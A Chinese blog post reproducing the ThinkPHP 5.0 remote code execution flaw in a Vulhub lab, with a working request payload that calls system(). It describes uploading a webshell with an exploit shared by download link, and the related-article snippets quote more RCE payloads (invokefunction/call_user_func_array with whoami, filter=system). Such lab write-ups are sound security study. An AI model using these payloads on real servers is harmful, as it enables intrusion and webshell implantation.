thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞

最新推荐文章于 2023-03-19 09:00:38 发布
最新推荐文章于 2023-03-19 09:00:38 发布
阅读量208 收藏
点赞数
文章标签: thinkphp漏洞

349eb4f6ef7c3600dd84547e90a50b2c.png

漏洞介绍

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,

简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用

影响版本

5.0全版本

复现环境

Vulhub漏洞靶场

vulhub-master/thinkphp/5.0.23-rce/

14b227ac7765e2cd74f49fb5443e074e.png

漏洞poc

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

72365cfa653d5a4aa70f6c9c559e8f0c.png

验证漏洞之后使用exp可直接上传webshell(111.php)

上传之后找到上传的webshell

46be2bd4d6de6ee43ed357110753091d.png

由于正常上传后不能正常显示所以在上传的时候是经过base64 加密的所以在链接的时候选择base64加密传输

1ddce4d28a67227835ed937f9f8e87dc.png

f635acda7c3ac0deffaf1c7f6374f393.png
exp 提取码ior6​pan.baidu.com
weixin_39634579
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rangechecks 检测代码检测到超出范围的数组访问。_Thinkphp 5.0远程代码执行漏洞
weixin_39956350的博客
12-16 703
0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。这部分是官网的漏洞通告,官方最开始的补丁是在library/think/route/dispatch/Module.php中添加。但是随机在第二天的5.1.31版本中将这部分的控制移动到...
thinkphp v5.0.11漏洞_漏洞预警通报【高危】
weixin_42299679的博客
12-21 939
1漏洞标题ThinkPHP5远程代码执行漏洞2漏洞描述ThinkPHP 是一个快速、兼容而且简单的轻量级国产 PHP 开发框架。ThinkPHP 从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。近日,ThinkPHP 官方发布了安全更新,其中修复了存在...
thinkphp v5.0.11漏洞_thinkphp 5.0 代码执行漏洞
weixin_39657662的博客
12-21 124
docker-compose -f /home/root/compose.yml up然后访问127.0.0.1:8080POC:1、?s=index/\think\Request/input&filter=phpinfo&data=12、?s=index/\think\Request/input&filter=system&data=id3、?s=index/\t...
thinkphp 一个文件怎么调用另一个文件中的define()_Thinkphp 反序列化利用链深入分析...
weixin_39605521的博客
12-10 133
作者:Ethan@知道创宇404实验室时间:2019年9月21日原文链接:https://paper.seebug.org/1040/前言今年7月份,ThinkPHP 5.1.x爆出来了一个反序列化漏洞。之前没有分析过关于ThinkPHP的反序列化漏洞。今天就探讨一下ThinkPHP的反序列化问题!环境搭建Thinkphp 5.1.35php 7.0.12漏洞挖掘思路在刚接触反序列化漏洞的时候,更...
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2021
thinkPHP5漏洞复现
yershop_v3.0.2.zip_thinkphp5_thinkphp5.0_yershop_yershop漏洞_网店系统
07-14
yershop是基于thinkphp5.0.9,具有建站便捷、扩展丰富、二次开发灵活,以及支持云服务的特点,适合企业及个人快速构建个性化网上商店。 yershop采用模块化的架构设计思想,对目录结构规范做了调整,可以支持多模块...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
漏洞通告ThinkPHP远程代码执行漏洞
最新发布
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
微简影音乐_音乐播放器_elephantqut_小程序_thinkphp5.0_简影后台_
09-29
总的来说,"微简影音乐"项目结合了小程序的前端技术和ThinkPhp5.0的后端力量,构建了一个跨平台的音乐播放解决方案,同时具备多平台音乐资源解析的能力,为用户提供了丰富的音乐体验。对于想要深入研究小程序开发、...
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2817
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马
m0_37360803的博客
03-11 1725
最近发现多个Thinkphp5开发的网站被挂马,导致首页被篡改,其他页面无法正常访问的情况。 木马中均包含以下代码: define(‘Viv, bebegim.’,‘Denzel-你的英雄’); 经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的getshell。 漏洞的详细原理参见:https://seaii-blog.com/index.php/...
网站被植入Webshell的解决方案
03-25 990
什么是Webshell 从字面上理解,”Web”指需要服务器开放Web服务,”shell”指取得对服务器的某种程度的操作权限。Webshell指匿名用户(入侵者)通过网站端口,获取网站服务器的一定操作权限。 Webshell通常是以ASP、PHP、JSP、ASA或者CGI等网页文件形式存在的一种命令执行环境,也称为网页后门。黑客在入侵网站后,通常会将Webshell后门文件与网站服务...
thinkphp 5.0.3 rce getshell_TPRCE绕过阿里云防护Getshell
weixin_39706127的博客
11-21 1430
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言这篇文章记录的是笔者在阅读某公众号发布的“记一次对****某校区失败的渗透测试”文章时发现存在漏点,找到目标站点并对原文章作者在Getshell时遇...
云服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程
06-30 5518
云服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
ThinkPHP 5.0 * 远程代码执行漏洞分析
热门推荐
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
TP5漏洞
Bul1et的博客
12-28 8633
漏洞POC /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami&tdsourcetag=s_pctim_aiomsg Poc2 /index.php?s=index/\think\app/invo...
tp5远程代码执行漏洞
$coding的博客
01-09 9377
1.查看网站版本信息 /index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1 index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[
ThinkPHP 5.0 远程代码执行漏洞详解
"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域,远程代码执行漏洞是一种极其危险的漏洞,允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告,专注于探讨了如何利用这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值